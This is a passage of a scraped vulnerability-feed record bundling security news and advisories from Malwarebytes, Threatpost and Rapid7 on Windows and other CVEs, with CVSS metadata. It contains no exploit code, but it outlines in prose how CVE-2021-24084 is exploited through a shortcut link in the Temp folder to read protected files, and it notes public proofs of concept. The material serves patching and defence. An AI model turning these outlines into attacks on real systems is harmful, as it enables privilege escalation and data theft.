[vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2016-8562>) in Siemens SIMATIC CP 1543-1 versions before 2.0.28 allows remotely authenticated users to cause a denial of service by modifying SNMP variables.\n * Multiple Cisco vulnerabilities on this list which could result in a DoS condition or cause an affected system to reload.\n\nOther vulnerabilities could allow attackers to run arbitrary code or cause a denial of service. 
For example, a [PowerPoint](<https://nvd.nist.gov/vuln/detail/CVE-2015-2424>) vulnerability that has been around since 2015 and was found to be used by the Russian state-sponsored team APT28 (aka Fancy Bear) in 2018.\n\nSome [Flash Player vulnerabilities](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) were found to be used in targeted attacks. The suspect in this case was APT37, also known as the North Korean \u201cLazarus\u201d group.\n\nA vulnerability in older Windows versions (Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1) would allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document. The use of this exploit was [attributed](<https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html>) to the Russian \u201cSANDWORM\u201d operation.\n\nI also found an Elevation of Privilege (EoP) [vulnerability in a Windows Installer](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>) on the CISA list that would allow an attacker to delete targeted files on a system. However, they would NOT gain privileges to view or modify file contents.\n\nOther interesting items on the list are some [IoT](<https://blog.malwarebytes.com/glossary/iot/>) vulnerabilities that got some fame in 2020 under the name [Ripple20](<https://www.jsof-tech.com/disclosures/ripple20/>). Successful exploitation of these vulnerabilities could result in denial of service, information disclosure or remote code execution.\n\nSo, is it just me or is there a trend here that shows vulnerabilities that were previously hard to exploit for financial gain, but are perfectly usable to disrupt operations? 
Could it be that, no surprise, the war in Ukraine has changed the nature of the actively exploited vulnerabilities?\n\nAccording to Adam Kujawa, Security Evangelist and Director of Malwarebytes' Threat Intel team:\n\n> "In 2007, we observed Russian sympathizers online utilizing hacking tools to launch disruption attacks against Georgian news networks and government networks, to prevent information from flowing to the public while Russia had troops roll in. Similar events have happened in Estonia, and Russian sponsored hackers are known to utilize Ukrainian networks as a kind of \u201cplayground\u201d for their attacks, shutting off power grids and other critical infrastructure, launching massive supply chain attacks against them (as in the case of NotPetya). And those are just some of the attacks we know about.\n\n> With that in mind, I believe that while many of these vulnerabilities are useless against actual intrusion and espionage, the exploits developed from them will be used to disrupt and degrade rather than collect.\n\n> I am not sure how many of these have been used in the wild, and while it is great to see CISA be proactive in spreading this information, I must wonder how much of the information will get to those protecting networks in Ukraine? Could it be that CISA may have just handed over the knowledge about various disruptive exploits that will work on unpatched systems, to be used against those who don\u2019t have endpoint patching as their top priority?"\n\n## Mitigation\n\nGiven the varied nature of the list, the most actionable advice is to keep an eye on the known exploited vulnerabilities catalog. To make things easier, you can [subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_136>) to receive the updates. 
Besides the [usual security advice](<https://blog.malwarebytes.com/awareness/2022/03/four-smb-cybersecurity-practices-during-geopolitical-upheaval/>), now seems to be a good time to invest in clever [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>), and ditch that software which has reached EOL and no longer receives security updates.\n\nStay safe, everyone!\n\nThe post [CISA list of 95 new known exploited vulnerabilities raises questions](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-03-14T11:18:33", "type": "malwarebytes", "title": "CISA list of 95 new known exploited vulnerabilities raises questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0367", "CVE-2014-4114", "CVE-2015-2424", "CVE-2016-4117", "CVE-2016-8562", "CVE-2021-41379"], "modified": "2022-03-14T11:18:33", "id": "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5", 
"href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-11-30T01:39:23", "description": "An unpatched Windows security vulnerability could allow information disclosure and local privilege escalation (LPE), researchers have warned. The issue (CVE-2021-24084) has yet to get an official fix, making it a zero-day bug \u2013 but a micropatch has been rolled out as a stop-gap measure.\n\nSecurity researcher Abdelhamid Naceri [originally reported](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) the vulnerability as an information-disclosure issue in October 2020, via Trend Micro\u2019s Zero-Day Initiative (ZDI). Though Microsoft had told him it was planning a fix for last April, the patch has not yet been forthcoming.\n\nThen, this month, Naceri discovered that CVE-2021-24084 could also be exploited for LPE, so that non-admin Windows users can read arbitrary files even if they do not have permissions to do so. In a proof-of-concept exploit, he demonstrated that it\u2019s possible to copy files from a chosen location into a Cabinet (.CAB) archive that the user can then open and read.\n\n> I mean this is still unpatched and allow LPE if shadow volume copies are enabled; \nBut I noticed that it doesn't work on windows 11 <https://t.co/HJcZ6ew8PO>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 15, 2021](<https://twitter.com/KLINIX5/status/1460338968780804098?ref_src=twsrc%5Etfw>)\n\nThe process for doing so is very similar to the [LPE exploitation approach](<https://www.hackingarticles.in/windows-privilege-escalation-hivenightmare/>) for the HiveNightmare bug, [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)**,** which affects the Security Accounts Manager (SAM) database in all versions of Windows 10. 
The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers.\n\n\u201cAs [HiveNightmare/SeriousSAM](<https://threatpost.com/win-10-serioussam/168034/>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\u201d Mitja Kolsek, head of the 0patch team, noted in a [recent posting](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>). \u201cWe confirmed this [for the zero-day and were] able to run code as local administrator.\u201d\n\n> It's still hilarious that this bug is still unpatched and fully functional on a windows 10 21H1 with october patch. <https://t.co/HO4Kwbql9z>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 2, 2021](<https://twitter.com/KLINIX5/status/1455500874596356098?ref_src=twsrc%5Etfw>)\n\n## **Windows 10 Bug Exploitation Details**\n\nSpecifically, the vulnerable functionality exists under the \u201caccess work or school\u201d settings, according to the opatch writeup. A normal user can make use of the \u201cexport your management log files\u201d function, which triggers the Device Management Enrollment Service.\n\n\u201cThis service first copies some log files to the C:\\ProgramData\\Microsoft\\MDMDiagnostics folder, and then packages them into a .CAB file whereby they\u2019re temporarily copied to C:\\Windows\\Temp folder,\u201d explained Kolsek. \u201cThe resulting .CAB file is then stored in the C:\\Users\\Public\\Public Documents\\MDMDiagnostics folder, where the user can freely access it.\u201d\n\nHowever, when the .CAB file is copied into the Windows Temp folder, a local attacker can pounce. 
The adversary would simply create a file shortcut link with a predictable file name that would normally be used in the normal export process, pointing to a target folder or file that the attacker would like to access.\n\n\u201cSince the Device Management Enrollment Service runs as Local System, it can read any system file that the attacker can\u2019t,\u201d Kolsek said.\n\nThere are two pre-requisites for achieving LPE, Kolsek noted.\n\n\u201cSystem protection must be enabled on drive C, and at least one restore point created. Whether system protection is enabled or disabled by default depends on various parameters,\u201d he said. And, \u201cat least one local administrator account must be enabled on the computer, or at least one \u2018administrators\u2019 group member\u2019s credentials cached.\u201d\n\nTo address the issue, the free micropatch simply checks for the presence of short-cut links during the .CAB file creation.\n\n\u201cThe function we patched is CollectFileEntry inside mdmdiagnostics.dll. This is the function that copies files from C:\\Windows\\Temp folder into the .CAB file, and can be tricked into reading some other files instead,\u201d Kolsek explained. \u201cOur patch is placed immediately before the call to CopyFileW that opens the source file for copying, and uses the GetFinalPathNameByHandleW function to determine whether any junctions or other types of links are used in the path. 
If they are, our patch makes it look as if the CopyFileW call has failed, thereby silently bypassing the copying of any file that doesn\u2019t actually reside in C:\\Windows\\Temp.\u201d\n\nVulnerable versions of Windows include:\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nWindows Servers are not affected, and neither are Windows 11, Windows 10 v1803 and older Windows 10 versions.\n\nMicrosoft did not immediately return a request for comment on the timeline for an official patch.
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T17:47:10", "type": "threatpost", "title": "Unpatched Windows 10 Zero-Day Allows Privileged File Access", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-36934"], "modified": "2021-11-29T17:47:10", "id": "THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "href": 
"https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-12-15T14:21:48", "description": "Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications.\n\nThe patch came as part of the computing giant\u2019s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft\u2019s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.\n\nSeven of the bugs addressed are rated critical, six were previously disclosed as zero-days and 60 are considered \u201cimportant.\u201d\n\nThe update brings the total number of CVEs patched by Microsoft this year to 887, which is down 29 percent in volume from a very busy 2020.\n\n## **Zero-Day Exploited in Wild**\n\nThe zero-day ([CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>)) is an important-rated spoofing vulnerability in the Windows AppX Installer, which is a utility for side-loading Windows 10 apps, available on the App Store.\n\nKevin Breen, director of cyber-threat research at Immersive Labs, explained that the bug \u201callows an attacker to create a malicious package file and then modify it to look like a legitimate application, and has been used to deliver Emotet malware, which [made a comeback](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) this year.\u201d\n\nBreen warned, \u201cthe patch should mean that packages can no longer be spoofed to appear as valid, but it will not stop 
attackers from sending links or attachments to these files.\u201d\n\nPrior to its fix today, the bug was seen in multiple attacks associated with Emotet, TrickBot and Bazaloader, according to Satnam Narang, staff research engineer at Tenable.\n\n\u201cTo exploit this vulnerability, an attacker would need to convince a user to open a malicious attachment, which would be conducted through a phishing attack,\u201d he explained via email. \u201cOnce exploited, the vulnerability would grant an attacker elevated privileges, particularly when the victim\u2019s account has administrative privileges on the system.\u201d\n\nIf patching isn\u2019t an option, Microsoft has provided some workarounds to protect against the exploitation of this vulnerability.\n\n## **Other Publicly Known Microsoft Vulnerabilities**\n\nIt\u2019s worth noting that Microsoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a privilege-escalation vulnerability in Windows Installer, for which [there\u2019s been an exploit circulating](<https://threatpost.com/attackers-target-windows-installer-bug/176558/>), and, reportedly, active targeting by attackers \u2013 even though Microsoft said it has seen no exploitation.\n\n\u201cThis appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation-of-privilege vulnerability in Windows Installer that was reportedly fixed in November,\u201d Narang said. \u201cHowever, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.\u201d\n\nBreen noted that this kind of vulnerability is highly sought after by attackers looking to move laterally across a network.\n\n\u201cAfter gaining the initial foothold, achieving administrator-level access can allow attackers to disable security tools and deploy additional malware or tools like Mimikatz,\u201d he said. 
\u201cAlmost all ransomware attacks in the last year employed some form of privilege escalation as a key component of the attack prior to launching ransomware.\u201d\n\nFour other bugs were listed as \u201cpublicly known\u201d but not exploited, all rated important and allowing privilege escalation:\n\n * [CVE-2021-43240](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43240>), a NTFS Set Short Name\n * [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a Windows Encrypting File System (EFS)\n * [CVE-2021-43880](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43880>), Windows Mobile Device Management\n * [CVE-2021-41333](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>), Windows Print Spooler\n\nThe update does not address CVE-2021-24084, an unpatched Windows security vulnerability [disclosed in late November](<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>), which could allow information disclosure and local privilege escalation (LPE).\n\n## **Critical-Rated Microsoft Security Bugs for December**\n\n 1. ### **CVE-2021-43215 in iSNS Server**\n\nThe first critical bug ([CVE-2021-43215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>)) to cover allows remote code-execution (RCE) on the Internet Storage Name Service (iSNS) server, which enables automated discovery and management of iSCSI devices on a TCP/IP storage network. 
It rates 9.8 out of 10 on the vulnerability-severity scale.\n\nThe bug can be exploited if an attacker sends a specially crafted request to an affected server, according to Microsoft\u2019s advisory.\n\n\u201cIn other words, if you\u2019re running a storage-area network (SAN) in your enterprise, you either have an iSNS server or you configure each of the logical interfaces individually,\u201d said Trend Micro Zero Day Initiative researcher Dustin Childs, in a [Tuesday blog](<https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review>). \u201cIf you have a SAN, prioritize testing and deploying this patch.\u201d\n\nBreen concurred that it\u2019s critical to patch quickly if an organization operates iSNS services.\n\n\u201cRemember that this is not a default component, so check this before you bump it up the list,\u201d he said via email. However, \u201cas this protocol is used to facilitate data storage over the network, it would be a high priority target for attackers looking to damage an organization\u2019s ability to recover from attacks like ransomware. These services are also typically trusted from a network perspective \u2013 which is another reason attackers would choose this kind of target.\u201d\n\n 2. ### **CVE-2021-43907 in Visual Studio Code WSL Extension**\n\nAnother 9.8-out-of-10-rated bug is [CVE-2021-43907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43907>), an RCE issue in Visual Studio Code WSL Extension that Microsoft said can be exploited by an unauthenticated attacker, with no user interaction. It didn\u2019t provide further details.\n\n\u201cThis impacted component lets users use the Windows Subsystem for Linux (WSL) as a full-time development environment from Visual Studio Code,\u201d Childs explained. \u201cIt allows you to develop in a Linux-based environment, use Linux-specific tool chains and utilities, and run and debug Linux-based applications all from within Windows. 
This sort of cross-platform functionality is used by many in the DevOps community.\u201d\n\n 3. ### **CVE-2021-43899 \u2013 Microsoft 4K Wireless Display Adapter**\n\nThe third and final 9.8 CVSS-rated bug is [CVE-2021-43899](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43899>), which also allows RCE on an affected device, if the attacker has a foothold on the same network as the Microsoft 4K Display Adapter. Exploitation is a matter of sending specially crafted packets to the affected device, according to Microsoft.\n\n\u201cPatching this won\u2019t be an easy chore,\u201d Childs said. \u201cTo be protected, users need to install the Microsoft Wireless Display Adapter application from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Only then can [they] use the \u2018Update & Security\u2019 section of the app to download the latest firmware to mitigate this bug.\u201d\n\n 4. ### **CVE-2021-43905 in Microsoft Office**\n\nAnother critical RCE bug ([CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>)) exists in the Microsoft Office app; it rates 9.6 on the CVSS vulnerability-severity scale, and Microsoft marked it as \u201cexploitation more likely.\u201d\n\n\u201cVery little is given away in the advisory to identify what the immediate risk is \u2013 it simply states the affected product as \u2018Office App,\u2019\u201d Breen noted. \u201cThis can make it difficult for security teams to prioritize or put mitigations in place if quick patching is not available \u2013 especially when security teams are already tied down with other critical patching.\u201d\n\nHowever, Aleks Haugom, researcher at Automox, said it should be a priority for patching.\n\n\u201cAs a low-complexity vulnerability, an attacker can expect repeated results,\u201d he said in a [Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-on-december-2021-patch-tuesday-release>). 
\u201cAlthough Microsoft has not disclosed exactly what user interaction is required for the attacker to succeed, they have confirmed that the Preview Pane is not an attack vector. Given that this threat can impact resources beyond the security scope managed by the security authority, immediate remediation actions are advised.\u201d\n\n 5. ### **CVE-2021-42310 in Microsoft Defender for IoT**\n\nOne of 10 issues found in Defender for IoT, this bug ([CVE-2021-42310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42310>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cA password reset request consists of a signed JSON document, a signing certificate, and an intermediate certificate that was used to sign the signing certificate,\u201d explained Childs. \u201cThe intermediate certificate is supposed to chain up to a root CA certificate built into the appliance. Due to a flaw in this process, an attacker can reset someone else\u2019s password. Patching these bugs requires a sysadmin to [take action](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-manage-the-on-premises-management-console#update-the-software-version>) on the device itself.\u201d\n\nThe other nine bugs in the platform include seven other RCE vulnerabilities, one elevation of privilege vulnerability and one data disclosure vulnerability, all rated \u201cimportant.\u201d\n\n 6. ### **CVE-2021-43217 in the Windows Encrypting File System (EFS)**\n\nThis bug ([CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cAn attacker could cause a buffer overflow that would lead to unauthenticated non-sandboxed code execution, even if the EFS service isn\u2019t running at the time,\u201d Childs explained. 
\u201cEFS interfaces can trigger a start of the EFS service if it is not running.\u201d\n\nJay Goodman, in the Automox posting, noted that it can be chained with the publicly disclosed elevation of privilege vulnerability in EFS and thus presents a special threat.\n\n\u201cWhile either of these vulnerabilities constitute impactful disclosures that need to be handled quickly, the combination of the two in a near universal service critical to securing and protecting data creates a unique situation,\u201d he said. \u201cAttacks could use the combination of RCE with privilege elevation to quickly deploy, elevate and execute code on a target system with full system rights. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread laterally.\u201d\n\nIn other words: This is a critical pair of vulnerabilities to address as soon as possible to minimize organizational risk.\n\n 7. ### **CVE-2021-43233 in Remote Desktop Client**\n\nThe flaw ([CVE-2021-43233](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43233>)) allows RCE and rates 7 on the CVSS scale. It\u2019s listed as \u201cexploitation more likely.\u201d\n\n\u201cThis one\u2026would likely require a social engineering or phishing component to be successful,\u201d Breen explained. \u201cA similar vulnerability, [CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>), was reported and patched in November. 
While it was also marked as \u2018exploitation more likely,\u2019 thankfully there have been no reports of proof-of-concept code or of it being exploited in the wild, which goes to show how important it is to make your own risk-based approach to prioritizing patches.\u201d\n\nAutomox researcher Gina Geisel emphasized the bug\u2019s high complexity for exploitation.\n\n\u201cTo exploit this vulnerability, an attacker requires control of a server and then must convince users to connect to it, through social engineering, DNS poisoning or using a man-in-the-middle (MITM) technique, as examples,\u201d she said. \u201cAn attacker could also compromise a legitimate server, host malicious code on it, and wait for the user to connect.\u201d\n\n## **Other Microsoft Bugs of Note for December**\n\nChilds also flagged [CVE-2021-42309](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42309>), an RCE issue in Microsoft SharePoint Server, as a vulnerability to prioritize. It allows an attacker to bypass the restriction against running arbitrary server-side web controls.\n\n\u201cThe vulnerability allows a user to elevate and execute code in the context of the service account,\u201d he explained. 
\u201cAn attacker would need \u2018Manage Lists\u2019 permissions on a SharePoint site, but by default, any authorized user can create their own new site where they have full permissions.\u201d\n\nHe said the issue is similar to the previously patched [CVE-2021-28474](<https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict>), except that the unsafe control \u201cis \u2018smuggled\u2019 in a property of an allowed control.\u201d\n\nOperating system bugs should be prioritized, researchers added.\n\n\u201cThe disclosures include a functional example in the case of the Print Spooler, proof-of-concept for the NTFS and Windows Installer vulnerabilities, so there is some cause to put urgency on the OS updates this month,\u201d Chris Goettl, vice president of product management at Ivanti, told Threatpost.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-14T22:21:35", "type": "threatpost", "title": "Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-24084", "CVE-2021-28474", "CVE-2021-38666", "CVE-2021-41333", "CVE-2021-41379", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43240", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43893", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907"], "modified": "2021-12-14T22:21:35", "id": "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "href": "https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-12-03T21:03:37", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41379 | [Microsoft Advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) | [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) | Scheduled (when patched) | ASAP (when released) | December 3, 2021 3:00 PM ET \n\n\n_See the Updates section at the end of this post for new information._\n\n## Description\n\nOn November 9, 2021, as part of Patch Tuesday, Microsoft released an update to address [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), a \u201cWindows Installer Elevation of Privilege Vulnerability\u201d that had a modest CVSS score (5.5), without much fanfare. The original CVE allows an attacker to delete files on a system using elevated privileges.\n\nFast-forward to November 22, 2021, when after investigating the patch, the researcher that discovered the vulnerability, Abdelhamid Naceri, found that it did not fully remediate the issue and published proof-of-concept (PoC) code on [GitHub](<https://github.com/klinix5/InstallerFileTakeOver>) proving exploitation of the vulnerability is still possible on patched versions of Windows allowing for SYSTEM-level privileges. 
The working PoC \u201coverwrites Microsoft Edge elevation service 'DACL' and copies itself to the service location, then executes it to gain elevated privileges.\u201d\n\nWith a zero-day exploit available, attackers have been chipping away at ways to utilize the vulnerability, especially in [malware](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>).\n\nAs of November 30, 2021, there is not an official patch from Microsoft to fully and effectively remediate this vulnerability. Community researchers and security practitioners have noted that other Microsoft zero-day vulnerabilities this year, such as [CVE-2021-36934](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) (\u201cHiveNightmare\u201d/\u201dSeriousSAM\u201d), were not fixed until typical Patch Tuesday release cycles even if public exploit code had already made an appearance. We expect that this vulnerability will follow that same pattern and that we won\u2019t see a new patch (and/or a new CVE, if Microsoft does indeed classify this as a patch bypass) until December 2021\u2019s Patch Tuesday.\n\n## Affected versions\n\nAccording to the researcher, all supported versions of Windows, including Windows 11 and Server 2022, are vulnerable to the exploit.\n\n## Guidance\n\nWith no official patch at this time, we recommend that organizations prepare to patch this as soon as the official fix is released. Meanwhile, Rapid7 researchers have confirmed that [a number of antimalware programs](<https://www.virustotal.com/gui/file/a43bafb2af2a1adcd1371ab3810b2908b591bc32798f3ad35ad662cf967b12fd/detection>) have added detection of Naceri's exploit, so as usual, keep those programs up to date. 
Lastly, organizations can detect previous exploitation of this PoC by monitoring for EventID 1033 and \u201ctest pkg\u201d (keeping in mind that the \u201ctest pkg\u201d will only find this exact PoC and may be modified by more enterprising attackers). \n**(Please see the Updates section regarding the latest on AV detection of this exploit).**\n\n\n\n## Rapid7 customers\n\nFor Rapid7 InsightVM customers, we will be releasing vulnerability checks if and when Microsoft publishes patch information for the new vulnerability.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find Windows assets by creating the following query: `os.family` `contains` `windows`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `OS` `contains` `windows`.\n\n## Updates\n\n[December 3, 2021] \nRapid7 has published an in-depth technical analysis on [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) that includes a streamlined, more functional PoC. 
Also of note, our research shows that attackers using this exploit can easily evade detection by AV.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T19:03:28", "type": "rapid7blog", "title": "Ongoing Exploitation of Windows Installer CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934", "CVE-2021-41379"], "modified": "2021-11-30T19:03:28", "id": "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "href": "https://blog.rapid7.com/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-14T17:27:53", "description": "\n\nOn December 14, 2021, during the [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>) chaos, Microsoft published [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS). 
